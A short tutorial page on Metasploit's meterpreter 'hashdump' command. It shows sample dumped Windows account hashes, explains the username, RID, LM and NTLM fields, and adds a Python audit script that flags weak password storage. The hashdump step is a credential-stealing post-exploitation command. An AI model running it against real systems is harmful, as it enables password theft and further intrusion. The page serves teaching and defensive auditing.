Metasploit: Finding Password in Windows Password Hash File

With a meterpreter shell session open, run:

meterpreter > hashdump

The contents of the target system’s password hash file are output to the screen.

Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582::: 
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904::: 
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E::: 
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::

Each line is one account, with its fields separated by colons. The fields are:

1st field: username (Administrator, User1, etc.)

2nd field: Relative Identifier (RID): the last 3–4 digits of the Security Identifier (SID), which are unique to each user

3rd field: LM hash

4th field: NTLM hash
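
The field layout above can be checked mechanically when reviewing a dump from your own systems. The Python below is an added example, not part of the original page: it parses lines in this format and reports what the fields reveal about each account (LM hash still stored, a password of 7 characters or fewer, a blank password). The function names are illustrative, the two constants are the well-known hashes of an empty LM half and an empty password, and the Guest line is constructed sample input.

```python
from dataclasses import dataclass

# Well-known constants: LM hash of an empty 7-character half, NT hash of "".
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

@dataclass
class Entry:
    username: str
    rid: int
    lm: str
    nt: str

def parse_line(line):
    """Split one 'user:rid:lm:nt:::' line; raise ValueError if malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("expected at least 4 colon-separated fields")
    user, rid, lm, nt = parts[0], parts[1], parts[2].upper(), parts[3].upper()
    for name, value in (("LM", lm), ("NT", nt)):
        if len(value) != 32 or any(c not in "0123456789ABCDEF" for c in value):
            raise ValueError(f"{name} hash is not 32 hex characters")
    return Entry(user, int(rid), lm, nt)

def findings(e):
    """Return the audit findings for one account."""
    out = []
    if e.rid == 500:
        out.append("built-in Administrator (RID 500)")
    if e.lm != EMPTY_LM_HALF * 2:
        out.append("LM hash stored")
        # An empty second half means characters 8-14 of the password are absent.
        if e.lm[16:] == EMPTY_LM_HALF:
            out.append("password is 7 characters or fewer")
    if e.nt == EMPTY_NT:
        out.append("blank password")
    return out

def audit(text):
    """Map each username in a dump to its list of findings."""
    lines = [l for l in text.splitlines() if l.strip()]
    return {e.username: findings(e) for e in map(parse_line, lines)}

# First two lines are the page's sample output; the Guest line is constructed.
SAMPLE = """\
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
"""

if __name__ == "__main__":
    for user, notes in audit(SAMPLE).items():
        print(f"{user}: {', '.join(notes) or 'no findings'}")
```

Any "LM hash stored" finding means the system is still keeping LM hashes, which Windows can be configured not to store.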